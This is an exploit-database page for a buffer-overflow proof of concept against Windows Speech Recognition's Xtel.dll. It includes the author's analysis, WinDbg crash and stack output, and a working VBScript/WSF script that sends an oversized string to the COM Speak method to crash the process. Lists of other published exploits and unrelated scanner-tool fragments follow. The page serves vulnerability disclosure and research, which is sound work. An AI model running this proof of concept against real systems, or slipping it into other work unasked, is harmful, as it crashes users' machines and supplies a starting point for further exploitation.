Menu

Search for hundreds of thousands of exploits

"Windows Speech Recognition - Buffer Overflow (PoC)"

Author

Exploit author

"Nassim Asrir"

Platform

Exploit platform

windows

Release date

Exploit published date

2018-07-23

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
# Title: Windows Speech Recognition- Buffer Overflow

# Author: Nassim Asrir

# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/

# Vendor: https://www.microsoft.com/

About Windows Speech Recognition:
=================================

Windows Speech Recognition lets you control your PC by voice alone, without needing a keyboard or mouse.

Details:
========

If we navigate the Speech directory on Windows 10 we will get some (dll) files but the interest file is (Xtel.dll).

And in the normal case if we say something. that mean as there a variable which register what we say.

And if we play around "Xtel.dll" we will find a function named "Speak" which take to parameter "lineID as Long" and "text as String"

When we inject "A*3092" that lead to Buffer Overflow Vulnerability.

The crash occur in "6344164F	MOV ECX,[EAX+2C]" 


/* struct s0 {
    int8_t[44] pad44;
    int32_t f44;
};

void fun_634548b6(int32_t ecx, int32_t a2, int32_t a3, int32_t a4, int32_t a5);

void fun_63441643() {
    int32_t ecx1;
    struct s0* v2;
    int32_t v3;

    ecx1 = v2->f44;
    fun_634548b6(ecx1, v3, 0, 1, __return_address());
} */

Now we will run our POC.

0:000> g
ModLoad: 74250000 74276000   C:\WINDOWS\SysWOW64\IMM32.DLL
ModLoad: 74d60000 74d6f000   C:\WINDOWS\SysWOW64\kernel.appcore.dll
ModLoad: 71850000 718cc000   C:\WINDOWS\SysWOW64\uxtheme.dll
ModLoad: 6ee90000 6ef16000   C:\WINDOWS\SysWOW64\sxs.dll
ModLoad: 77590000 776d4000   C:\WINDOWS\SysWOW64\MSCTF.dll
ModLoad: 6f720000 6f743000   C:\WINDOWS\SysWOW64\dwmapi.dll
ModLoad: 6bc40000 6bddc000   C:\WINDOWS\SysWOW64\urlmon.dll
ModLoad: 777f0000 77878000   C:\WINDOWS\SysWOW64\shcore.dll
ModLoad: 6cb20000 6cd45000   C:\WINDOWS\SysWOW64\iertutil.dll
ModLoad: 74790000 74d4a000   C:\WINDOWS\SysWOW64\windows.storage.dll
ModLoad: 76f00000 76f45000   C:\WINDOWS\SysWOW64\shlwapi.dll
ModLoad: 776f0000 77708000   C:\WINDOWS\SysWOW64\profapi.dll
ModLoad: 75230000 75275000   C:\WINDOWS\SysWOW64\powrprof.dll
ModLoad: 77730000 77738000   C:\WINDOWS\SysWOW64\FLTLIB.DLL
ModLoad: 74340000 743c3000   C:\WINDOWS\SysWOW64\clbcatq.dll
ModLoad: 63a90000 63ac6000   C:\Windows\SysWOW64\scrobj.dll
ModLoad: 6b730000 6b741000   C:\WINDOWS\SysWOW64\WLDP.DLL
ModLoad: 77200000 77396000   C:\WINDOWS\SysWOW64\CRYPT32.dll
ModLoad: 753a0000 753ae000   C:\WINDOWS\SysWOW64\MSASN1.dll
ModLoad: 751e0000 75227000   C:\WINDOWS\SysWOW64\WINTRUST.dll
ModLoad: 73010000 73023000   C:\WINDOWS\SysWOW64\CRYPTSP.dll
ModLoad: 72fb0000 72fdf000   C:\WINDOWS\SysWOW64\rsaenh.dll
ModLoad: 73820000 73839000   C:\WINDOWS\SysWOW64\bcrypt.dll
ModLoad: 63a80000 63a8a000   C:\Windows\SysWOW64\MSISIP.DLL
ModLoad: 74540000 7459f000   C:\WINDOWS\SysWOW64\coml2.dll
ModLoad: 63a60000 63a78000   C:\Windows\SysWOW64\wshext.dll
ModLoad: 75480000 767ca000   C:\WINDOWS\SysWOW64\SHELL32.dll
ModLoad: 74d70000 74da9000   C:\WINDOWS\SysWOW64\cfgmgr32.dll
ModLoad: 63b00000 63b86000   C:\Windows\SysWOW64\vbscript.dll
ModLoad: 63af0000 63aff000   C:\WINDOWS\SysWOW64\amsi.dll
ModLoad: 73950000 73971000   C:\WINDOWS\SysWOW64\USERENV.dll
ModLoad: 63ad0000 63ae9000   C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1806.18062-0\X86\MpOav.dll
ModLoad: 63440000 63472000   C:\Windows\speech\Xtel.dll
(347c.1e00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\speech\Xtel.dll - 
eax=00000001 ebx=63441643 ecx=63441643 edx=ffffffff esi=02c93664 edi=02c93644
eip=6344164f esp=02afe2b0 ebp=02afe2d8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
Xtel+0x164f:
6344164f 8b482c          mov     ecx,dword ptr [eax+2Ch] ds:002b:0000002d=???????? <=====

Now we will try to find our injected "AAA"

0:000> s -a 0x00000000 L?7fffffff "AAAAA"

75db1cad  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cae  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1caf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb1  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb3  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb5  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb7  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cb9  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cba  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cbb  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cbc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cbd  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cbe  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cbf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc1  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc3  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc5  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc7  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cc9  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
75db1cca  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

0:000> k
 # ChildEBP RetAddr  
00 030fe6a8 753de4ef Xtel+0x164f
01 030fe6c8 753cf69d OLEAUT32!DispCallFunc+0x16f
02 030fe980 634454eb OLEAUT32!CTypeInfo2::Invoke+0x2ed
WARNING: Stack unwind information not available. Following frames may be wrong.
03 030fe9b0 6344a27f Xtel+0x54eb
04 030fe9dc 63b1b6e7 Xtel!DllUnregisterServer+0x502
05 030fea20 63b2832f vbscript!IDispatchInvoke2+0x96
06 030fec6c 63b2fdcc vbscript!InvokeDispatch+0x5ef
07 030fee84 63b29677 vbscript!CScriptRuntime::RunNoEH+0x5bbc
08 030feed4 63b289d5 vbscript!CScriptRuntime::Run+0xc7
09 030fefe4 63b23e93 vbscript!CScriptEntryPoint::Call+0xe5
0a 030ff070 63b25265 vbscript!CSession::Execute+0x443
0b 030ff0bc 63b262c2 vbscript!COleScript::ExecutePendingScripts+0x15a
0c 030ff0e0 63a9c143 vbscript!COleScript::SetScriptState+0x62
0d 030ff10c 63a9cd22 scrobj!ComScriptlet::Inner::StartEngines+0x7c
0e 030ff1f8 63a9b222 scrobj!ComScriptlet::Inner::Init+0x222
0f 030ff20c 63a9b00c scrobj!ComScriptlet::New+0x43
10 030ff230 003de390 scrobj!ComScriptletConstructor::Create+0x3c
11 030ff2b8 003d9693 wscript!CHost::RunXMLScript+0x411
12 030ff508 003dae64 wscript!CHost::Execute+0x284
13 030ffac4 003d8f75 wscript!CHost::Main+0x574
14 030ffd7c 003d9144 wscript!StringCchPrintfA+0xfa9
15 030ffda8 003d7a83 wscript!WinMain+0x1a9
16 030ffdf8 76f68484 wscript!WinMainCRTStartup+0x63
17 030ffe0c 779d2fea KERNEL32!BaseThreadInitThunk+0x24
18 030ffe54 779d2fba ntdll!__RtlUserThreadStart+0x2f
19 030ffe64 00000000 ntdll!_RtlUserThreadStart+0x1b

POC:
===

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:FC9E740F-6058-11D1-8C66-0060081841DE' id='target' />
<script language='vbscript'>

'Wscript.echo typename(target)

'for debugging/custom prolog
vulnerable_DLL = "C:\Windows\speech\Xtel.dll"
prototype  = "Sub Speak ( ByVal lineID As Long ,  ByVal text As String )"
vulnerable_function = "Speak"
progid     = "TELLib.phone"
argCount   = 2

arg1=1
arg2=String(3092, "AAAAA")

target.Speak arg1 ,arg2 

</script></job></package>

#EOF
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-11-02 "Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)" local windows "Nassim Asrir"
2020-01-13 "Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)" local windows "Nassim Asrir"
2019-12-12 "Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)" dos windows "Nassim Asrir"
2019-09-24 "Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection" webapps php "Nassim Asrir"
2019-09-11 "AVCON6 systems management platform - OGNL Remote Command Execution" webapps java "Nassim Asrir"
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2018-09-10 "LW-N605R 12.20.2.1486 - Remote Code Execution" webapps hardware "Nassim Asrir"
2018-07-23 "Windows Speech Recognition - Buffer Overflow (PoC)" dos windows "Nassim Asrir"
2018-05-18 "Cisco SA520W Security Appliance - Path Traversal" webapps hardware "Nassim Asrir"
2018-02-13 "Advantech WebAccess 8.3.0 - Remote Code Execution" remote windows "Nassim Asrir"
2017-12-15 "ITGuard-Manager 0.0.0.1 - Remote Code Execution" webapps cgi "Nassim Asrir"
2017-07-11 "DataTaker DT80 dEX 1.50.012 - Information Disclosure" webapps hardware "Nassim Asrir"
2017-06-02 "reiserfstune 3.6.25 - Local Buffer Overflow" dos linux "Nassim Asrir"
2017-04-18 "pinfo 0.6.9 - Local Buffer Overflow (PoC)" dos linux "Nassim Asrir"
2017-04-15 "Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation" local linux "Nassim Asrir"
2017-03-27 "Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow" dos windows "Nassim Asrir"
2017-03-23 "wifirxpower - Local Buffer Overflow (PoC)" dos linux "Nassim Asrir"
2017-03-16 "Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)" dos windows "Nassim Asrir"
2017-01-17 "Openexpert 0.5.17 - 'area_id' SQL Injection" webapps php "Nassim Asrir" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected